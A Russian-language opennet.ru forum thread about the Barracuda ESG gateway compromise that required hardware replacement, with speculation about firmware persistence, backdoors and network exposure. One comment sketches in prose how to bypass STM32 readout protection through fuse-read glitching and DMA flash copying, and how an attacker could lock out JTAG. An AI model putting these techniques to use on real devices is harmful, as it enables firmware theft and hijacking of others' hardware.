The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Компрометация шлюзов Barracuda ESG, требующая замены оборудования"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Компрометация шлюзов Barracuda ESG, требующая замены оборудования"  +/
Сообщение от opennews (?), 11-Июн-23, 10:28 
Компания Barracuda Networks объявила о необходимости физической замены устройств ESG (Email Security Gateway), поражённых вредоносным ПО в результате 0-day уязвимости в модуле обработки вложений к электронной почте. Сообщается, что для блокирования проблемы установки ранее выпущенных патчей недостаточно. Подробности не приводятся, но предположительно решение о замене оборудования принято из-за атаки, приведшей к установке вредоносного ПО на низком уровне, и невозможности его удалить путём замены прошивки или сброса в заводское состояние. Оборудование будет заменено бесплатно, о компенсации расходов на доставку и работу по замене не уточняется...

Подробнее: https://www.opennet.dev/opennews/art.shtml?num=59278

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по времени | RSS]


1. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +12 +/
Сообщение от КО (?), 11-Июн-23, 10:28 
Комиссия спалила их бэкдор и теперь требуют убрать
Ответить | Правка | Наверх | Cообщить модератору

4. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +6 +/
Сообщение от Аноним (4), 11-Июн-23, 10:32 
Убрать эту компанию из списка поставщиков, бекдор оказалась слишком аппаратным.
Ответить | Правка | Наверх | Cообщить модератору

14. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +3 +/
Сообщение от Аноним (14), 11-Июн-23, 11:08 
новое железо с обновленным бекдором
Ответить | Правка | Наверх | Cообщить модератору

22. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +6 +/
Сообщение от Аноним (22), 11-Июн-23, 12:04 
На самом деле это достаточно просто устроить, имхо: если апдейт на фирмвару от хаксора откажется потом грузить фирменнные апдейты, а бутлоадер заменит на свой, отказывающийся шить вендорскую фирмвару... это все не так уж сложно сделать как можно себе представить.

И тут вендор такой - опа! Его выперли с его же девайса. Жытаг осваивайте, там свое всегда отспорить можно :)

Ответить | Правка | К родителю #4 | Наверх | Cообщить модератору

37. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +3 +/
Сообщение от anodymus (?), 11-Июн-23, 14:49 
> Жытаг осваивайте, там свое всегда отспорить можно :)

Не всегда. Иногда предохранители выжигаются при записи софта для защиты от аппаратной отладки. Тот же народный STM32, например. И уже не перезальёшь ничего. Только чип перепаивать.

Ответить | Правка | Наверх | Cообщить модератору

86. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от Тот_ещё_аноним (ok), 12-Июн-23, 09:01 
На колодку ставить)
Ответить | Правка | Наверх | Cообщить модератору

114. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (114), 12-Июн-23, 22:47 
1) STM32 F1xx и тому подобные - можно "вернуть себе" как раз всегда. Там лишь 1 уровень защиты от чтения - и он не запрещает дебаг или ROM loader насовсем, лишь ограничивает операции. Такой чип всегда можно вернуть в "девственный" вид, но, правда, только, после полного стирания - так что фирмвару из него вы не получите. Как минимум официально и удобно.
2) Де факто есть атака с использованием этого дебажного доступа, позволяющая большую часть фирмвары все-таки выковырять. Очень креативным обходом STшных защит через I-bus. Но это не полная копия и стопроцентно спиратить-забэкапить все же не получится.
3) F0/L0/L1/etc сделали 2-й уровень защиты, он более мерзкий и отключает жытаг и ROM лоадер. И вот тут чипак уже делает только то что хочет его встроенная фирмвара. И если "юзерский" бутлоадер и фирмвара - и вас к себе пускать не хотят - вот тут уже неудобненько получается, потому что красивого и официального способа нет, replace MCU and press any key.
4) Менее официально, это состояние врубается только если фуз профлешен в вполне конкнетное состояние. И его инверсная копия - тоже. Если поймать момент когда чип читает состояние фузов и сбить вот это вот, вы все правильно поняли: чип вывалится в fallback-режим с защитой уровня 1. После этого станет доступен JTAG и бутлоадер. Далее см. пункт 1.

И это работает в обе стороны. Атакующий сменивший "юзерский" бутлоадер в флехе на свой и быренько вырубающий JTAG при старте может сделать довольно неудобно легитимному обладателю системы, если апдейтилось через их кастомный бут а не STшный ROM (довольно дурной и специфичный). Жытагом/swd правда все равно зацепиться можно - если оно RESET# умеет зажимать, так что запрет жытага в коде (например рекрнфигом пинов) обломается.

Физически как вы уже поняли там ничего и никогда не выжигается. Там даже "boot ROM" - отдельная секция в модуле флеша, рядом с секцией фузов. ST шьет его на фабе, видимо, через JTAG или SWD. Потом сегмент, вероятно, лочится в readonly, а процедура программирования этого сегмента вообще не документирована. Можно и свои сегменты в readonly loчить, сделав этакий эквивалент ROM-loader в фирмваре - потом его стереть станет достаточно канительно.

И фузы - лишь байтики в отдельной секции массива флеша. Они как бы стирабельны - и если F0/L0/L1 выбить из level 2 lock заскоками с питанием сбивающими чтение фузов, потом его можно стереть и вернуть в фабричный вид как обычно с level 1 защитой.

Есть и еще несколько забавных исследований - например из F0 при определенных условиях исследователи вообще всю прощивку выдергивать научились.

p.s. а китайские клоны вообще позорники: чаще всего забывают даже "детские" веши заткнуть, типа попросить DMA читануть флеху -> RAM (mem2mem xfer), опа, ололо, можно забрать буфер из RAM (level 1 не блочит работу с SRAM, но вырубает доступ в флеш для всего что не I-bus проца). И так за несколько итераций можно DMA понакидать себе флеху -> SRAM и слить ее дебагером. Копипастеры из китая такие вещи забывают учесть.

Ответить | Правка | К родителю #37 | Наверх | Cообщить модератору

83. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (83), 12-Июн-23, 08:00 
Intel Boot Guard должен запрещать загрузку вирусных прошивок BIOS/UEFI, а они уже вирусных BootLoader-ов и далее по цепочке верифицированной загрузки.

Это не снимает проблему окерпичивания устройства при заражении.

Ответить | Правка | К родителю #22 | Наверх | Cообщить модератору

72. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от igaiLie7 (?), 11-Июн-23, 23:44 
Не смешно, когда собственные устройства работают против вас. Прогресс, а что поделать? Жизнь полна неожиданностей.
Ответить | Правка | К родителю #4 | Наверх | Cообщить модератору

118. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от Аноним (114), 12-Июн-23, 22:56 
> Не смешно, когда собственные устройства работают против вас.
> Прогресс, а что поделать? Жизнь полна неожиданностей.

Вы sci-fi когда-нибудь смотрели? Перехват инженерных систем более-менее крупных (или массовых) кораблей - невероятно злой, эффективный и нахальный вид диверсий, ведущих к жирным факапам у адресата атаки. Как вы уже поняли если в большой системе управляемой компьютерами обосновался кто-то другой, вы основательно залетаете. А еще, как вы догадались, все это реализуемо и уже в общем то начинает иметь определенный смысл. Уже были очень интересные атаки когда хацкеры с информационно-развлекательной системы самолета влезали в куда более интересный сегмент сети. Где вон те компьютеры общаются как раз. Ведь нынче в моде fly by wire. Это как раз доисторический прототип тех звездных крейсеров, первобытная и кривая пока еще версия. Знакомьтесь.

Ответить | Правка | Наверх | Cообщить модератору

2. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +13 +/
Сообщение от Аноним (4), 11-Июн-23, 10:31 
Всегда знал что эти аппаратные комплексы по защите чего угодно полная туфта.
Ответить | Правка | Наверх | Cообщить модератору

15. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  –15 +/
Сообщение от пох. (?), 11-Июн-23, 11:10 
Чего это вдруг? Вот жеж, защитили. Прибор защищенный плавким предохранителем успешно защитил предохранитель, расплавившись первым.

Враг не прошел в корпоративную сеть. Правда, пару месяцев теперь сеть без почты, в ожидании rma, но так, наверное, и было задумано?

P.S. дайте угадаю, у ней внутре помимо неонки был lin00ps

Ответить | Правка | Наверх | Cообщить модератору

24. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +4 +/
Сообщение от Аноним (4), 11-Июн-23, 12:08 
Я к тому зачем вообще этой штуке кроме софта, ещё какая-то своя аппаратная конструкция. Такое конечно делают во всяких аппаратных балансировщиках, для большой нагрузки. Но вот даже там понятно что ты это не сможешь обновиться так просто или научить эту штуку новым трюкам.

Собственно сабж что-то такое и словил что раз уж он такой аппаратный, оптимизированный и на низком уровне обновить его нельзя и защищает он до первого серьёзного инцидента. Был бы это просто обычный ПК с прогой там всё ясно обновился и всё почта под защитой. Ну ок нагрузка у тебя большая поставь два таких или десять. Это я даже не говорю что эту прогу можно поставить туда где вся остальная почта крутится.

Ответить | Правка | Наверх | Cообщить модератору

27. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +3 +/
Сообщение от Аноним (27), 11-Июн-23, 12:23 
Я думаю, что всё гораздо проще. Перешили биос и поставили флаг защиты от записи в области, где конфиг чипсета хранится. И теперь чипсет не даёт прошить, нужно вынимать чип и в программатор его. Но так как вскрывать корпус категорически запрещено, ибо коммерческая тайна, копирайты и т.д., то будьте добры переслать Корпорации.

Кто скупит устройство задешево на Авито у тех, кто начнёт от них избавляться, и научится перешивать сам, тот неплохо подзаработает.

Ответить | Правка | Наверх | Cообщить модератору

30. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +3 +/
Сообщение от пох. (?), 11-Июн-23, 12:38 
> Я думаю, что всё гораздо проще. Перешили биос и поставили флаг защиты

Еще проще - взяли и отрубили перешивалку. Может и ненарочно даже а под rm -f подпала. А поскольку это не компьютер, мониторчик-клавиатурку не подключишь и с флэшечки не загрузишься - то и без конторского сервисмена знающего как подключаться напрямую к плате хрен что перепрошьешь даже если оно и подлежит перепрошивке.

Контора прикинула количество и цену командировок сервисмена и решила что проще все забрать себе на склад и заменить.

> от записи в области, где конфиг чипсета хранится. И теперь чипсет
> не даёт прошить, нужно вынимать чип и в программатор его. Но
> так как вскрывать корпус категорически запрещено, ибо коммерческая тайна, копирайты и

просто ни банк ни завод не будут вскрывать корпус какой-то ит-коробки и что-то там ковырять. А вы как всегда свою конспирологию на пустом месте разводите.

Нет штатного варианта восстановления - значит нет его, везите откуда получали.

> Кто скупит устройство задешево на Авито у тех, кто начнёт от них
> избавляться, и научится перешивать сам, тот неплохо подзаработает.

никому не нужны устаревшие стоечные серверы малой мощности. А больше ты на нем ничего не заработаешь.

Ответить | Правка | Наверх | Cообщить модератору

73. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от igaiLie7 (?), 11-Июн-23, 23:46 
> А вы как всегда свою конспирологию на пустом месте разводите.

Ой, извините, я наверное забыл снять свою конспирологическую шапочку. Буду знать, что нужно быть более скептичным к любым возможным объяснениям и просто принимать все как есть.

> никому не нужны устаревшие стоечные серверы малой мощности.

Вот-вот, кто же захочет купить устаревшие серверы? Особенно если они имеют проблемы с перепрошивкой. Продажа таких устройств на Avito — просто золотая жила для всех, кто хочет заработать деньги. Какой план!

Ответить | Правка | Наверх | Cообщить модератору

29. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от пох. (?), 11-Июн-23, 12:35 
> Я к тому зачем вообще этой штуке кроме софта, ещё какая-то своя аппаратная конструкция.

ну типа когда компьютеры были большие - это было неплохим вариантом (тот же цискин аплайанс тоже аппаратный изначально, хотя сейчас есть и виртуальные айронпорты)

Ну и сп-ть китайскому конкуренту сложнее.

> Был бы это просто обычный ПК с прогой там всё ясно обновился

в обычном тоже бывают всякие уефи и bmc, в которых тоже может прописываться малварь и вообще хрен выковыряешь. Виртуализация - да, до некоторой степени защищает, но тоже не в этом случае - тут явно старательно копали, а такие могут накопать и дырку из вм в хост, тем более что их регулярно есть.

А аплайанс заменил и дело с концом, так что и в этом плане вариант не худший. Место в стойке - ну жалко, да.

Ответить | Правка | К родителю #24 | Наверх | Cообщить модератору

63. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от kusb (?), 11-Июн-23, 22:46 
А там ещё-что то совсем аппаратное есть, типа Asic? И их нельзя будет задействовать из-за уязвимости?  А если использовать аккуратно asic, со знанием дела?
Или почему с новой прошивкой это устройство уже не нужно, хотя раньше было нужно?
Ответить | Правка | Наверх | Cообщить модератору

70. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от Tron is Whistling (?), 11-Июн-23, 23:07 
В барракудах? Нет там ничего. Обычный x86 с перелицованным корпусом.
Ответить | Правка | Наверх | Cообщить модератору

45. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от ivan_erohin (?), 11-Июн-23, 18:02 
> Враг не прошел в корпоративную сеть.

почему ? как раз прошел и (будем готовиться к худшему) закрепился там внутри.
железка была использована как плацдарм, можете ее менять, можете не менять -
все равно нужен аудит и зачистка всего вплоть до сетевых принтеров и
контроллеров СКУД-видео-противопожарки.

Ответить | Правка | К родителю #15 | Наверх | Cообщить модератору

47. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (47), 11-Июн-23, 18:30 
Хорошая фантазия. На практике же, у этой железки нет доступа в корпоративную сеть. Это почтовый гейт, от которого до ближайшего Exchange минимум один фаерволл и один роутер, а по соседству в том же влане в лучшем случае второй такой же гейт. Да и то не факт, что им друг с другом разрешено общаться. Кроме того, исследования не нашли следов и возможностей для дальнейших эскалаций.
Ответить | Правка | Наверх | Cообщить модератору

54. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от ivan_erohin (?), 11-Июн-23, 19:56 
> до ближайшего Exchange

вы сами все и сказали. никто за язык не тянул.

> минимум один
> фаерволл и один роутер,

фаерволлы, роутеры и вланы не помогают против атак на приложения.
волшебные пакеты, волшебные письма и т.п. проходят через них.

Ответить | Правка | Наверх | Cообщить модератору

57. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (47), 11-Июн-23, 20:18 
И что изменилось с появлением взломанной Барракуды? Волшебные письма и пакеты получили +30 к волшебству? Эксчендж стал каким-то более уязвимым от того, что ровно те же письма по ровно тому же SMTP получает не напрямую с твоего открытого релея, а от гейта?
Ответить | Правка | Наверх | Cообщить модератору

61. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (61), 11-Июн-23, 22:19 
С большой вероятностью с той барракуды был открыт доступ к ексченджу и лдап АД.. хорошо если только по минимуму, к нужным портам, а не просто к IP (или, если "повезло", вообще он стоял внутри периметра)...
Ответить | Правка | Наверх | Cообщить модератору

75. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от Аноним (47), 11-Июн-23, 23:52 
Тоже хорошая фантазия, и тоже ближе к фольклору, чем к реальности. Компании, которые пользуются подобными устройствами, так же используют референсную архитектуру, предоставляемую вендором. А в тех случаях, когда это невозможно, платят вендору или интегратору за кастомизацию. В противном случае вендор просто откажется от всех гарантий. И правильно сделает, в общем-то. Открытый доступ во внутреннюю сеть с почтового гейта бывает в сомнительных полуподвальных конторках, предпочитающих б/у с ебея, и эникеев с района. Но такие и не покупают вендорские решения для фильтрации почты, как раз наоборот, от них почту фильтровать приходится.
Ответить | Правка | Наверх | Cообщить модератору

79. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от пох. (?), 12-Июн-23, 00:25 
> С большой вероятностью с той барракуды был открыт доступ к ексченджу

ну так ее для этого ломать не надо было - просто послать письмо.
А никаких других доступов в таких случаях открывать не принято (у тех у кого принято - нет деньгов на баракудину подписку).

ldap ad - ну можно поподбирать учетки для фишинга, но опять же ты ж их и так мог подбирать, можно даже не рассылая самих писем, просто с RCPT TO экспериментируя.

Вот если в dmz помойка (а вот так - бывает и у крупняка - фсе тащить в dmz, и подальше, подальше)- - то можно поискать каких-нибудь соседей по планете, с какими-нибудь глупостями в настройках (вот такое - тоже весьма часто).
То есть не то чтоб прям совсем ужасно, но хорошего мало.

Ну, может поумнеют и нормальный файрвол купят. Или имеющийся настроят. Пока я такое настраивал - типовой сеткой за файрволом была /29 - мне не жалко, у него вланов четыре тыщи и еще останется на интерконнекты вполне достаточно.


Ответить | Правка | К родителю #61 | Наверх | Cообщить модератору

81. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от _ (??), 12-Июн-23, 04:28 
> Ну, может поумнеют и нормальный файрвол купят. Или имеющийся настроят.

Вроде не совсем ду** волшебный на голову но всё же - сморозил :) Выкинут на ЮХ и переёдут на O365, чтоб забыть этот гимморой напрочь :) Если чо - я работал в компании которая и продала Barracuda и IronPort собственно антиспам. Дык вот все те Ынженегры - перековались, не нужно это никому.

Ответить | Правка | Наверх | Cообщить модератору

89. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от пох. (?), 12-Июн-23, 11:06 
>> Ну, может поумнеют и нормальный файрвол купят. Или имеющийся настроят.
> Вроде не совсем ду** волшебный на голову но всё же - сморозил
> :) Выкинут на ЮХ и переёдут на O365, чтоб забыть этот

а им дадут? Нам, например, afaik, нельзя.

А кто мог перейти на 365 уже давно всех админов поувольнял и коробки сдал в металлолом, зачем оно, и так же ж всеработает.

> гимморой напрочь :) Если чо - я работал в компании которая
> и продала Barracuda и IronPort собственно антиспам. Дык вот все те
> Ынженегры - перековались, не нужно это никому.

это ты еще цискиных не видел :-(
Я тут давно-давно кидал ссылку на промо nginx+ - лет десять уже если не больше прошло.
Все что вы хотели знать но на самом деле совсем не хотели про состояние (уже не) современного IT.

Поскольку вряд ли то видео выжило, краткий пересказ: чувак представляется - "я тут новенький, а был я вообще-то разработчиком в cisco. А теперь я proud to be пресейл-менеджером в nginx+!" ЧТОА?!

Дальше, собственно, и смотреть то видео было незачем, только идти бухать с горя.

Ответить | Правка | Наверх | Cообщить модератору

101. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (47), 12-Июн-23, 16:39 
> "я тут новенький, а был я вообще-то разработчиком в cisco. А теперь я proud to be пресейл-менеджером в nginx+!" ЧТОА?!

Пресейлсы из разрабов хорошие получаются. Ну, при условии, что разраб не аутист и может с любыми людьми общаться, а не только с другими разрабами. Работа пресейлса — перевести с человеческого языка на программистский и понять, может ли вообще продукт делать то, что бизнесу надо, а если не может — как быстро и какой кровью можно допилить чтобы мог. И можно ли вообще.

> Дальше, собственно, и смотреть то видео было незачем, только идти бухать с горя.

С горя ли, от радости — всё равно бухать. Ну и в чём разница тогда?

Ответить | Правка | Наверх | Cообщить модератору

105. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (105), 12-Июн-23, 18:24 
>"я тут новенький, а был я вообще-то разработчиком в cisco. А теперь я proud to be пресейл-менеджером в nginx+!" ЧТОА?!

Лично знаю кучу народа, которые подались в продакт-менеджеры, сейлы, тимлиды (некодящие) из разрабов, и все исключительно по причине того, что кодить до смерти надоело, а тут другая и очень даже веселая жизнь. Только часть разрабов любители своего дела, большинство затесались на время. Они же и раздули в инторнетах миф, что разраб после 30-35-ти-это неудачник, раз не выбился в тимлиды-менеджеры etc, а продолжает прозябать (по их мнению) за кодингом.

Ответить | Правка | К родителю #89 | Наверх | Cообщить модератору

128. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  –1 +/
Сообщение от Аноним (114), 13-Июн-23, 10:30 
> Лично знаю кучу народа, которые подались в продакт-менеджеры, сейлы,

Продакт (project) манагеры это обычно как раз очень крутые кодеры. А то что львиную долю работ теперь другие ворочают под их чутким руководством - ну, знаете, а еще главе фирмы не обязательно лично разгружать каждый грузовик.

> тимлиды (некодящие)

И как оно, извините, лидирует и кому? Команде техписов чтоли? :)

> из разрабов, и все исключительно по причине того, что кодить до смерти надоело,

Значит это изначально не их было и они приперлись туда только из-за денег. Но вообще-то PM/архитект а для особо удачливых и CTO - это логичная эволюция кодера. В какой-то момент можно понять что скилл достаточно крут чтобы попытаться на этот уровень втянуть команду в целом, задавая им тон, показывая как надо было. При необходимости умея это вот именно лично показать.

> ти-это неудачник, раз не выбился в тимлиды-менеджеры etc, а продолжает
> прозябать (по их мнению) за кодингом.

Как ни странно обе точки зрения имеют свой пойнт а истина как обычно сложнее чем некоторые пытаются вещать.

Ответить | Правка | Наверх | Cообщить модератору

71. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 11-Июн-23, 23:11 
Угу. Пришлось срочно перевыписывать все внешние сертификаты... тот ещё геморрой с учётом процедур.
Ответить | Правка | К родителю #45 | Наверх | Cообщить модератору

3. Скрыто модератором  –7 +/
Сообщение от Аноним (-), 11-Июн-23, 10:31 
Ответить | Правка | Наверх | Cообщить модератору

6. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  –3 +/
Сообщение от Аноним (6), 11-Июн-23, 10:32 
Видимо, атака спецслужб. Кто ещё ради этого в прошивку полезет? Чё, бинго сорвали, многие покупатели устройства менять не станут/смогут, а выкинуть устройства в мусор они себе позволить не могут, так и будут юзать вредоносное устройство. Особенно, если они находятся в подсанкционном государстве, или против них введены санкции.
Ответить | Правка | Наверх | Cообщить модератору

8. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от Бывалый смузихлёб (?), 11-Июн-23, 10:36 
так американские спецслужбы сделали что хотели, но сторонние хацкеры, пробравшись в их притон, спалили контору и теперь требуется срочно закрыть "внезапно обнаруженную" дыру
Ответить | Правка | Наверх | Cообщить модератору

9. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (9), 11-Июн-23, 10:36 
>нескольких видов вредоносного ПО - SALTWATER, SEASPY и SEASIDE

Что, прямо в имплантах их названия записаны? Или специально придуманы, чтобы сделать вид, что это продукция одной организации, любящей давать своим вредоносам и программам слежки названия из одних прописных?

Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

26. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от n00by (ok), 11-Июн-23, 12:11 
> Что, прямо в имплантах их названия записаны?

Не знаю, что такое имплант, но в теле зловреда нередко оставляют текстовые строки.

Ответить | Правка | Наверх | Cообщить модератору

28. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от Аноним (28), 11-Июн-23, 12:25 
Да, специально, чтобы была для антивируса сигнатура, в авторстве сомнений не было, и чтобы реверсить было проще! Строки если нужны - то их наоборот хешируют.
Ответить | Правка | Наверх | Cообщить модератору

35. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +2 +/
Сообщение от n00by (ok), 11-Июн-23, 14:29 
Что тут обычно, так это качество анонимной экспертизы. По факту Rustock.C был так назван, поскольку содержал в себе путь к имени файла с исходниками.
Ответить | Правка | Наверх | Cообщить модератору

48. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (47), 11-Июн-23, 18:32 
Не смогут позволить что именно? Коробку скотчем замотать и лейбу на принтере распечатать? Замена за счёт вендора.
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

49. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от пох. (?), 11-Июн-23, 18:38 
> Не смогут позволить что именно? Коробку скотчем замотать и лейбу на принтере
> распечатать? Замена за счёт вендора.

о времена, о нравы - еще небось на СВОЕМ принтере?!

Эх... А когда-то малчык прибегал с коробкой в ручонках и торжественно ее нам вручал в обмен на сдохшую... давно енто было, конечно.


Ответить | Правка | Наверх | Cообщить модератору

58. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (47), 11-Июн-23, 20:21 
Мальчик с тех пор подрос, и работает в UPS. Но таки да, печатать приходится на своём принтере.
Ответить | Правка | Наверх | Cообщить модератору

69. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 11-Июн-23, 23:06 
Почему не станут-то? Нам вообще заменили мегаоперативно - мы обратились в первый день оповещений, через два дня получили пачку железок.
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

102. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (47), 12-Июн-23, 16:44 
> Видимо, атака спецслужб. Кто ещё ради этого в прошивку полезет?

Ради чего «этого»? Ради сбора всей корреспонденции бизнеса? Ну даже не знаю, кому это может быть интересно, кроме таинственных спецслужб. Наверное… Всем кто обретается в этом бизнесе? От биржевых спекулянтов до конкурентов и контрагетов? Да нет, бред какой-то. Конечно же это спецслужбы, следят с целью слежки. От внутренней непримиримой злобы.

Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

119. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (114), 12-Июн-23, 23:02 
> Видимо, атака спецслужб. Кто ещё ради этого в прошивку полезет?

Ну вон автор MIRAI не был спецслужбами. Зато собрал ботнет в 300К ботов в момент, завалил несколько CDNов так что его друго-врага Креббса хостер выпер, хоть и "защита от DDoS". Креббс впрочем в долгу не остался и помог поймать этого вредителя. Инфррмационная безопасность - это как-то так.

А при чем тут прошивки? MIRAI - ультра кроссплатформенная пакость, интересующаяся в основном IoT устройствами. Поддерживает дюжины этак полторы процессорных архитектур - а начальный качальщик может дать мастеркласс по кроссплатформенному программированию когда о системе не известно ничего, кроме того что там линух. Ему даже версия и тип libc пофиг, он сисколами линуха минимальный subset нужного собирает себе. Правда и x86 он тоже не брезгует, ежели прокатило, для него у него тоже билд есть - что 32 что 64 бита. Так что на гитхабе ЭТО лежит (или как минимум лежало), но вот запускать на своем компе собраный бинарь все же не рекомендуется.

Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

10. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +11 +/
Сообщение от YetAnotherOnanym (ok), 11-Июн-23, 10:36 
> ESG представляет собой аппаратно-программный комплекс для защиты электронной почты предприятий от атак, спама и вирусов.

Причиной пожара стало возгорание противопожарной системы.
> при выполнении кода через Perl-оператор "qx"

Классика жанра. Уж сколько раз твердили миру, что дёргать утилиты в дочернем шелле - ещё больший моветон, чем использовать goto.

Ответить | Правка | Наверх | Cообщить модератору

20. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (20), 11-Июн-23, 11:40 
Ты не шаришь в goto?
Ответить | Правка | Наверх | Cообщить модератору

32. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от YetAnotherOnanym (ok), 11-Июн-23, 13:48 
Пытаешься троллить или просто проецируешь?
Ответить | Правка | Наверх | Cообщить модератору

40. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Ivan_83 (ok), 11-Июн-23, 15:52 
goto ничем не плох, проме того что в кривых руках он ломает читабельность.
В правильных он наоборот читабельность повышает и упрощает логику.
Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

53. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +6 +/
Сообщение от Аноним (53), 11-Июн-23, 19:27 
Классика жанра:
* Код мой -> упрощение логики и повышенная читабельность
* Код чужой -> кривые руки и поломанная читабельность
Ответить | Правка | Наверх | Cообщить модератору

64. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от Ivan_83 (ok), 11-Июн-23, 22:55 
Вовсе нет.
Я долго избегал goto у себя в коде, пока не увидел его в исходниках ядра FreeBSD, и там оно реально сильно упрощало логику и повышало читабельность.

Сам часто использую для того чтобы вывалится в тот кусок функции который обрабатывает ошибку и освобождает ресурсы перед возвратом кода ошибки.
Очень редко для retry.

Ответить | Правка | Наверх | Cообщить модератору

78. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  –2 +/
Сообщение от Аноним (53), 12-Июн-23, 00:13 
> использую для того чтобы вывалится в тот кусок функции который обрабатывает ошибку и освобождает ресурсы

Ну вот это как раз потому, что у вас в коде типичная сишная императивная лапша, где в одной функции вместе с логикой намешаны и аллокация, и освобождение, и обработка ошибок.

Ответить | Правка | Наверх | Cообщить модератору

131. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Ivan_83 (ok), 13-Июн-23, 21:59 
И что с того?
Ответить | Правка | Наверх | Cообщить модератору

55. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Liinemail (ok), 11-Июн-23, 20:03 
> дёргать утилиты в дочернем шелле - ещё больший моветон, чем использовать goto

Ну как бы нет. Это за использование qx для запуска шела на бить по рукам. Это означает, что разраб вообще не понимал, что делает. Если там такой уровень разработки - все эти железки нужно срочно отключать и убирать на полку.

Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

88. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +2 +/
Сообщение от Аноним (88), 12-Июн-23, 10:57 
В программировании не бывает жёстких законов - только указания.

GOTO удобен для описания конечных автоматов.

Синглтоны - это норма: большинство классов нужно только в одном экземпляре. Делать синглтоны через грязный хак в конструкторе - обычно боком выходит, через DI - хорошо.

В глобальной переменной удобно хранить логгер.

Протектед методы нужно покрывать юнит-тестами если пишешь фреймворк.

Внешние ключи не используются в больших БД с шардингом.

Если это облегчает восприятние кода, то можно его хоть в два столбика писать, называть переменные a1, a2, a3, и мешать snake_case с CamelCase и lowerCamelCase.

И таких примеров - миллионы. Всегда нужно думать своей головой.

Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

126. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от Аноним (114), 13-Июн-23, 10:16 
> GOTO удобен для описания конечных автоматов.

